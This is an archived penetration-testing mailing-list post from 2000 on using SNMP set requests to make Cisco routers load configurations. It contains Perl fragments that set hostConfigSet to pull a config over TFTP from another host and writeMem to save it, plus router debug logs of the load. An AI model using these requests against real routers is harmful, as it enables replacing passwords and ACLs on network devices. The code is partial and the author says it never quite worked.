Penetration Testing mailing list archives
[PEN-TEST] Fwd: Re: Attacking Cisco using SNMP
From: "Teicher, Mark" <mark.teicher () NETWORKICE COM>
Date: Tue, 28 Nov 2000 19:49:08 +0100
Oops.. Forgot this tidbit of information: The SNMP_set command loads the MIB definitions contained in file. The MIB file is usually located at the file system position defined by the file argument. There are five passes involved when processing a Set request: 1. Each variable in the variable binding list of the received PDU is checked to guarantee that each object is accessible and/or creatable, and writable. 2. The test method for each object is called to verify the object's instance, size/range, and value. 3. The variable binding list is parsed to construct a list of simultaneous Set operations for groups of objects. 4. This pass verifies that all required objects within a group have specified or default values. 5. It also insures that all required values meet the relational constraints specified in the MIB. 6. Sets are then performed on all of the individual objects that can be reversed in case something goes wrong. There is are limitations on what the values for 'pathName' would be. This is the only required command line argument by the User. The 'pathName' is a file name with directory path. For instance, if the file contains passwords, the read and write actions are will act as the file to update the passwords for the routers. Likewise, if the file contains ACLs, the router will update itself for security enforcement.
Date: Tue, 28 Nov 2000 19:46:41 +0100 To: Penetration Testers <PEN-TEST () securityfocus com>, PEN-TEST () securityfocus com From: mark.teicher () networkice com Subject: Re: Attacking Cisco using SNMP Cc: "Matthew.Brown () predictive com" <Matthew.Brown () predictive com>, joseph.knape () predictive com Never quite could get it to work correctly.. But anyways, here are some code snippets and packet captures to help you out.. You have to remember some of us know very little about SNMP_set and how it can be utilized to manage large enterprise networks. (biting tongue -:) sub snmp_raw_set { local($nr,$request) = @_; local($w1,$r2,$resp,@ret,@info); $w1 = "wh10" . $nr; $r2 = "rh20" . $nr; print $w1 ">$request\n"; # The next line is unneeded, if uncommented will cause wrong error code to be # generated. # $resp = <$r2>; print $w1 "?\n"; $resp = <$r2>; # should give return code if (isError($resp)) { return 0; }; return substr($resp,2); } 1; *Mar 1 03:41:54.875 PST: TFTP: Sending read request *Mar 1 03:41:54.879 PST: UDP: sent src=192.168.55.121(6608), dst=192.168.55.188 (69), length=60 *Mar 1 03:41:54.879 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethern et0), len 60, sending *Mar 1 03:42:01.543 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0 *Mar 1 03:42:01.567 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0 *Mar 1 03:42:01.891 PST: SNMP: Response, reqid 2, errstat 5, erridx 1 lsystem.53.192.168.55.188 = /cisco/ironlung-config *Mar 1 03:42:01.919 PST: SNMP: Packet sent via UDP to 192.168.55.188 *Mar 1 03:42:01.923 PST: UDP: sent src=192.168.55.121(161), dst=192.168.55.188(33345), length=96 *Mar 1 03:42:01.927 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethernet0), len 96, sending *Mar 1 03:42:01.935 PST: IP: s=192.168.55.188 (Ethernet0), d=192.168.55.121 (Ethernet0), len 112, rcvd 3 *Mar 1 03:42:01.939 PST: ICMP: dst (192.168.55.121) port unreachable rcv from 192.168.55.188 *Mar 1 03:42:01.943 PST: SNMP: Packet received via UDP from 192.168.55.188 on Ethernet0 *Mar 1 03:42:01.951 PST: SNMP: Set request, reqid 2, errstat 0, erridx 0 lsystem.53.192.168.55.188 = /cisco/ironlung-configg *Mar 1 03:42:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 192.168.55.188. *Mar 1 03:42:01.999 PST: SNMP: Queuing packet to 192.168.55.188 *Mar 1 03:42:01.999 PST: SNMP: V1 Trap, ent ciscoConfigManMIB.2, addr 192.168.55.121, gentrap 6, spectrap 1 ccmHistoryEventEntry.3.58 = 2 ccmHistoryEventEntry.4.58 = 6 ccmHistoryEventEntry.5.58 = 3 Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-IS56-L), Version 11.2(8), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1997 by cisco Systems, Inc. Compiled Tue 05-Aug-97 09:07 by ckralik Image text-base: 0x00001448, data-base: 0x00561104 ROM: System Bootstrap, Version 4.14(9.1), SOFTWARE ironlung uptime is 2 weeks, 13 hours, 19 minutes System restarted by power-on System image file is "c2500-is56-l.112-8.Z", booted via flash Host configuration file is "/cisco/ironlung-confg", booted via tftp from 192.168.55.188 cisco 2500 (68030) processor (revision D) with 16384K/2048K bytes of memory. Processor board ID 01560898, with hardware revision 00000000 Bridging software. Snmpset is an SNMP application that uses the SET Request to set information on a network entity. One or more fully qualified object identifiers must be given as arguments on the command line. A type and a value to set must accompany each object identifier. Each variable name is given in the format specified in variables. If the network entity has an error processing the request packet, an error packet will be returned and a message will be shown, helping to pinpoint in what way the request was malformed. If there were other variables in the request, the request will be resent without the bad variable. sub confActions { my($tftpHost, $pathName, $initHost, $comm) = @_; postMessages("confActions($tftpHost, $pathName, $initHost, $comm)", $LOGDBG); if ($tftpHost eq $initHost) { postMessages(">>>> tftpHost = router: $initHost <<<<",$LOGERR); return; } if (!openSNMP($initHost, $comm)) { postMessages("$initHost\:", $LOGDBS); if ($ConfFlag == $ConfRead || $ConfFlag == $ConfLoad) { $v = "hostConfigSet\[$tftpHost\]=\"$pathName\""; $results = &snmp_set($COMMPORT, $v); postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS); } if ($ConfFlag == $ConfWrite || $ConfFlag == $ConfLoad) { $v = "writeMem=1"; $results = &snmp_set($COMMPORT, $v); postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS); } closeSNMP(); } postMessages("confActions exits", $LOGDBG); } At 08:37 AM 11/29/00 +0800, David Taylor wrote:On Tue, 28 Nov 2000, Fabio Pietrosanti (naif) wrote: > [snip] > Does someone ever used snmpset to upload and/or download configuration > file from a cisco ios 12 with new system mib ? Fabio, I haven't had a need to do this (yet), but the Cisco v2 MIBS include quite a bit of in-line documentation on how this would be done. See the URL below for the relevant MIB... ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CONFIG-COPY-MIB.my Regards, Dave Taylor
Current thread:
- [PEN-TEST] Fwd: Re: Attacking Cisco using SNMP Teicher, Mark (Nov 29)